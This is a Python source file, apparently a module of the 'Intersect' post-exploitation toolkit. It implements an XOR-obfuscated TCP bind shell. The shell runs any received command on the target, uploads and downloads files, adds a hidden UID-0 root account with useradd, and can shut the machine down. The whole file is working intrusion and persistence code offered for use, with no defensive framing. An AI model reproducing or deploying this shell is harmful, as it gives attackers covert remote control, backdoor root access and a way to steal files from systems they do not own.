
def xor(string, key):
    data = ''
    for char in string:
        for ch in key:
            char = chr(ord(char) ^ ord(ch))
        data += char
    return data


def xorshell():
    '''
    @description: Starts a TCP bind shell on the target system. Interactive shell with download/upload, cd and ability to execute other modules remotely."
    @author: ohdae [bindshell@live.com]
    @short: TCP bindshell
    '''
    HOST = ''
    server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR,1)
    try:
        log_msg("[ XOR Bindshell module executed ]")
        server.bind((HOST, PORT))
        server.listen(5)
    except:
        print "[!] Connection closed."
    	sys.exit(2)
                                
    while 1:                                     
        conn, addr = server.accept()
        log_msg("New shell connection")
        conn.send(xor("\nIntersect "+str(os.getcwd())+" => ", PKEY))
        reaper()
        childPid = os.fork()
        if childPid == 0:
            xorhandle(conn)
        else:
            shellPID.append(childPid)


def xorhandle(conn):
    time.sleep(3)

    while True:
        cmd = conn.recv(socksize)
        cmd2 = xor(cmd, PKEY)
        proc = Popen(cmd2,
             shell=True,
             stdout=PIPE,
             stderr=PIPE,
             stdin=PIPE,
             )
        stdout, stderr = proc.communicate()

        if cmd2.startswith('cd'):
            destination = cmd2[3:].replace('\n','')
            if os.path.isdir(destination):
                os.chdir(destination)
                conn.send(xor("\nIntersect "+str(os.getcwd())+" => ", PKEY))
            elif os.path.isdir(os.getcwd()+destination):
                os.chdir(os.getcwd()+destination)
                conn.send(xor("\nIntersect "+str(os.getcwd())+" => ", PKEY))
            else:
                conn.send(xor("[!] Directory does not exist", PKEY)) 
                conn.send(xor("\nIntersect "+str(os.getcwd())+" => ", PKEY))

        elif cmd2.startswith(':addroot'):
            strip = cmd.split(" ")
            acct = strip[1]
            os.system("/usr/sbin/useradd -M -o -s /bin/bash -u 0 -l " + acct)
            conn.send(xor("[+] Root account " + acct + " has been created.\n", PKEY)) 

        elif cmd2.startswith(':upload'):
            getname = cmd2.split(" ")
            rem_file = getname[1]
            filename = rem_file.replace("/","_")
            data = conn.recv(socksize)
            filedata = xor(data, PKEY)
            newfile = file(filename, "wb")
            newfile.write(filedata)
            newfile.close()
            if os.path.isfile(filename):
                conn.send(xor("[+] File upload complete!", PKEY))
            if not os.path.isfile(filename):
                conn.send(xor("[!] File upload failed! Please try again", PKEY))

        elif cmd2.startswith(':download'):
            getname = cmd2.split(" ")
            loc_file = getname[1]
            if os.path.exists(loc_file) is True:
                sendfile = open(loc_file, "r")
                filedata = sendfile.read()
                sendfile.close()
                senddata = xor(filedata, PKEY)
                conn.sendall(senddata)
            else:
                conn.send(xor("[+] File not found!", PKEY))

        elif cmd2.startswith(":reboot"):
            conn.send(xor("[!] Server system is going down for a reboot!", PKEY))
            os.system("shutdown -h now")

        elif cmd2 == (":mods"):
            conn.send(xor(str(modList), PKEY))
            conn.send(xor("\nIntersect "+str(os.getcwd())+" => ", PKEY))

        elif cmd2.startswith(":exec"):
            pass
            #getmod = cmd2.split(" ")
            #rmod = getmod[1]
            #if rmod in modList:
            #    rmod = rmod+"()"
            #    exec rmod
            #    conn.send(xor("\n[+] Executing module...", PKEY))
            #else:
            #    conn.send(xor("\n[!] Module not loaded!", PKEY))

        elif cmd2 == (':killme'):
            conn.send(xor("[!] Shutting down Intersect!\n", PKEY))
            conn.close()
            sys.exit(0)

        elif cmd2 == (':quit'):
            conn.send(xor("[!] Closing shell connection!\n", PKEY))
            conn.close()
            os._exit(0)

        elif proc:
            conn.send(xor( stdout , PKEY))
            conn.send(xor("\nIntersect "+str(os.getcwd())+" => ", PKEY))



